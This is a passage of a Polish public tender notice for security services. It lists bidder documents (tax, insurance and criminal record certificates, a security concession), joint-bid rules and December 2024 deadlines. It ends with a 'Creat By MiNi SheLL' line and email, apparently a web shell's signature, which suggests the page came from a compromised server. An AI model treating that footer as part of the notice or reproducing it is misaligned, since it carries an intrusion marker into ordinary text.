1 i 2 ustawy Pzp,<br/>b)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się <br/>o zamówienie publiczne tytułem środka karnego,<br/>c)	art. 109 ust. 1 pkt 2 lit. a ustawy Pzp,<br/>d)	art. 109 ust. 1 pkt 2 lit. b ustawy Pzp, dotyczącej ukarania za wykroczenie, za które wymierzono karę aresztu,<br/>e)	art. 109 ust. 1 pkt 3 ustawy Pzp, dotyczącej skazania za przestępstwo lub ukarania za wykroczenie, za które wymierzono karę aresztu, sporządzonej nie wcześniej <br/>niż 6 miesięcy przed jej złożeniem,<br/>2)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, <br/>że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp , wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, <br/>a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem należy złożyć dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami <br/>lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, <br/>że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne <br/>i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek <br/>na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem należy złożyć dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>4)	oświadczenia Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu (załącznik nr 5 do SWZ);<br/>5)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>6)	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a)	art. 108 ust. 1 pkt 3 ustawy,<br/>b)	art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania <br/>się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c)	art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d)	art. 108 ust. 1 pkt 6 ustawy,<br/>e)	art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia <br/>12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2023 r. poz. 70),<br/>f)	art. 109 ust. 1 pkt 2 lit. b ustawy, dotyczących ukarania za wykroczenie, za które wymierzono karę ograniczenia wolności lub karę grzywny,<br/>g)	art. 109 ust. 1 pkt 2 lit. c ustawy,<br/>h)	art. 109 ust. 1 pkt 3 ustawy, dotyczących ukarania za wykroczenie, za które wymierzono karę ograniczenia wolności lub karę grzywny,<br/>i)	art. 109 ust. 1 pkt 5-10 ustawy,<br/>7)	informacji z Centralnego Rejestru Beneficjentów Rzeczywistych, w zakresie art. 108 ust. 2 ustawy Pzp, jeżeli odrębne przepisy wymagają wpisu do tego rejestru, sporządzonej nie wcześniej niż 3 miesiące przed jej złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.	W celu oceny spełnienia przez Wykonawcę warunków, o których mowa w pkt. VI.2 ppkt 2) SWZ należy na wezwanie Zamawiającego, pod rygorem wykluczenia z postępowania, złożyć w wyznaczonym przez Zamawiającego terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujące podmiotowe środki dowodowe: - ważną i aktualną koncesję wydaną przez MSWiA na prowadzenie działalności w zakresie ochrony osób i mienia, zgodnie z ustawą z dnia 22.08.1997 r. o ochronie osób i mienia.<br/>7.	W celu oceny spełnienia przez Wykonawcę warunków, o których mowa w pkt. VI.2 ppkt 3) SWZ, należy na wezwanie Zamawiającego, pod rygorem wykluczenia z postępowania, złożyć w wyznaczonym przez Zamawiającego terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia następujące podmiotowe środki dowodowe:<br/>1)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, <br/>w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>2)	dokumentów potwierdzających, że Wykonawca jest ubezpieczony <br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia;<br/>2)	Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu <br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo/upoważnienie do pełnienia takiej funkcji wystawione zgodnie <br/>z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli każdego z Wykonawców występujących wspólnie należy załączyć do oferty;<br/>3)	oferta winna być podpisana przez każdego z Wykonawców występujących wspólnie lub przez upoważnionego przedstawiciela;<br/>4)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy;<br/>5)	jeżeli oferta wspólna złożona przez dwóch lub więcej Wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych Wykonawców, podpisanej przez wszystkich Wykonawców, przy czym termin, na jaki została zawarta nie może być krótszy niż termin realizacji zamówienia.<br/>8.	Wykonawców obowiązują postanowienia pkt. VII &#34;Wykaz oświadczeń lub dokumentów, potwierdzających spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia &#34; pkt. 29.(jak wyżej) w sprawie dokumentów wymaganych w przypadku składania oferty wspólnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp oraz wskazanym <br/>w projektowanych postanowieniach umowy w sprawie zamówienia publicznego (projekcie umowy) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-06 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-06 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com